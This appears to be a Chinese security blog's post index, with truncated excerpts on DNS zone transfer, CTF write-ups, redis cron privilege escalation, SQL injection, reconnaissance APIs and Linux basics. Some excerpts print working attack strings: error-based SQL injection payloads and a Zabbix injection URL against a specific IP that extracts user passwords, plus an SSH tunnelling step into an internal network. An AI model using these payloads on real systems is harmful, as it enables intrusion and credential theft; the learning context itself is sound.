- 博客(21)
- 收藏
- 关注
转载 DNS域传送漏洞
nslookup -type=ptr 8.8.8.8 #查询一个IP地址对应的域名nslookup -type=ns baidu.com #查询baidu.com使用的DNS服务器名称nslookup #进入交互式shellserver ns2.baidu.com ...
2017-01-05 18:12:00
129
转载 对一道pwnhub的一点点记录
一.通过ssh弱口令,建立socket5代理进内网。1.修改proxychains配置文件vi /etc/proxychains.conf如下:2.建立ssh隧道:ssh -qTfnN -D 7070 -p 22 user@host,能够curl本地,说明成功代理进内网。二.开放9000端口,存在fastcgi文件读取漏洞,可参考:http://www.lij...
2016-12-25 13:16:00
160
转载 redis写定时任务获取root权限
前提:1.redis由root用户启动。2.开启cron的时候,/var/spool/cron linux机器下默认的计划任务,linux会定时去执行里面的任务。启动服务 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列) sudo /etc/init.d/cron start (ubuntu系列...
2016-11-18 19:52:00
375
转载 对某道ctf的一点点记录
题目:http://ctf5.shiyanbar.com/web/pcat/index.php是一道注入的题,主要利用了offset 和 group by with rollup的知识1.offset的使用和limit 0,1效果一样的,试试查一下第一条数据2.看看group by XX 与 group by XX with rollup的区别3.现在正式进入...
2016-09-24 15:20:00
115
转载 mysql手工注入步骤
1.一般用 ' " ) 等符号来闭合,再用%23(即#)来注释后面语句。2.查找数据库,先用order by n猜字段,再用union select 1,2,3 ...n%23来查询。union select 1,2,database()%233.利用information_schema库中tables这张表,查mysql数据库中的第一个表。select ta...
2016-09-11 17:37:00
118
转载 用threading和Queue模块实现多线程的端口扫描器
一.Queue模块基础q = Queue.Queue() q.qsize() 返回队列的大小 q.empty() 如果队列为空,返回True,反之False q.full() 如果队列满了,返回True,反之False q.full 与 maxsize 大小对应 q.get([block[, ...
2016-08-18 12:16:00
116
转载 linux下lz4解压缩遇到的那些事儿
一.Debian系列:Debian、Ubuntu等1.1 kali下修改apt-get源: vim /etc/apt/sources.list deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib deb http://mirrors.ustc.edu.cn/kali-security/ sa...
2016-08-10 20:41:00
676
转载 Shell编程之运算符和环境变量配置文件
一.shell运算符: declare命令: declare -i 变量名 #声明变量 eg. movie[o]=dzp #定义数组 eg. echo ${movie[*]} #调用数组 declare -p 变量名 #查看变量属性 数...
2016-08-03 15:42:00
92
转载 Shell编程之变量
Bash变量:用户自定义变量,环境变量,位置参数变量,预定义变量用户自定义变量: #变量赋值等号两侧不能有空格 #调用变量加$ eg. echo $x #变量的叠加:x="$x"456 或 x=${x}789 set #查看变量 set -u #echo时看变量是否存在 unset 变量名 ...
2016-08-02 10:50:00
63
转载 信息收集之zoomeye
一.浏览器上使用api接口1.https://api.zoomeye.org/user/login post传参:{"username" : "username","password" : "password"}2.返回的token,用Modify Headers修改为"Authorization: JWT <YOUR-API-TOKEN>"3.请求http://...
2016-08-01 16:51:00
1823
转载 信息收集之censys
一.摘要Censys提供了search、view、report、query、export以及data六种API接口。search接口的请求地址是https://www.censys.io/api/v1/search/?,其中?的地方可以是ipv4、websites或者certificates,分别代表搜索ipv4主机、网站和证书。我们的POST请求应该是一组包含query、pag...
2016-08-01 13:19:00
1513
转载 linux权限管理
一.基本权限 chmod 模式 文件名 #修改权限 eg.chmod u+x,g+w,o+w 文件名 eg.chmod u-x,g-w,o-w 文件名 eg.chmod u=rwx,g=ew 文件名 r---4 w---2 x---1 eg.chmod 755 文件名 ...
2016-07-26 18:51:00
61
转载 linux软件安装管理
1.软件包分类: 源码包 二进制包(RPM包,系统默认包) 脚本安装包2.安装时的一些常用命令: rpm -ivh 包全名 #安装 rpm -Uvh 包全名 #升级 rpm -e 包名 #卸载 rpm -qa | grep 包名 #查询所装过...
2016-07-21 16:10:00
55
转载 Linux网络管理
1.linux配置ip: ifconfig命令临时配置 ifconfig eth0 192.168.254.200 netmask 255.255.255.0 setup工具永久配置 setup service network restart 修改网络配置文件 vi /etc/sysconfi...
2016-07-19 19:59:00
70
转载 磁盘管理与用户管理
一.磁盘管理1.df 查看磁盘分区使用状况 du 统计磁盘上的文件大小2.MBR分区: fdisk -l fdisk 分区路径 #开始分区 m #查看帮助信息 主分区 扩展分区————>逻辑分区3.GPT分区:parted select /dev/sdc ...
2016-07-18 11:28:00
80
转载 shell基础
Shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口。它接收用户输入的命令并把它送入内核去执行。1.常用类别:Bourne shell(sh)、C shell(csh)和Korn shell(ksh)。2.echo: echo -e #-e为特殊字符特殊处理 \t(table键) \n(换行) \x(十六进制) ...
2016-07-14 15:09:00
67
转载 关于linux的一些基础知识
一.基础1.linux所有内容以文件形式保存,包括硬件。2.linux 不区分扩展名,靠权限区分。 #但是,约定 .sh脚本文件 .conf配置文件。3.-rw-r--r-- #第一位(-文件,d目录,l软链接文件),后面每三位一组(u所有者 g所属者 o其他人),(r读 w写 x执行)。4.cd ./XXX/xxx #从当前路径...
2016-07-12 22:17:00
73
转载 关于Re模块的一些基础知识(另附一段批量抓代理ip的代码)
1.常用匹配规则. 表示任意字符[0-9] 用来匹配一个指定的字符类别[^5]表示除了5之外的其他字符,^不在字符串的开头,则表示它本身。* 对于前一个字符重复0到无穷次+ 对于前一个字符重复1到无穷次?对于前一个字符重复0到1次{m,n} 对于前一个字符重复次数在为m到n次,其中,{0,} = *,{1,} = , {0,1} = ?{m} 对于前一个字符重复m次| 表示"或"pyth...
2016-05-19 17:27:00
150
转载 从urllib和urllib2基础到一个简单抓取网页图片的小爬虫
urllib最常用的两大功能(个人理解urllib用于辅助urllib2)1.urllib.urlopen()2. urllib.urlencode() #适当的编码,可用于后面的post提交数据import urllibDict = {'name' : 'Michael Foord', 'location' : 'Northamp...
2016-05-17 23:58:00
76
转载 关于SQL注入的五大报错注入函数
~全部都以查user()为例子~1.floor()id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)2.extractvalue()id = 1 and (extractvalue(...
2016-05-14 22:38:00
1153
转载 zabbix的命令执行
1.对于低版本的可用下列exp直接打到用户http://119.29.48.232/zabbix/httpmon.php?applications=2 and (select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) ...
2016-05-13 18:21:00
131
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人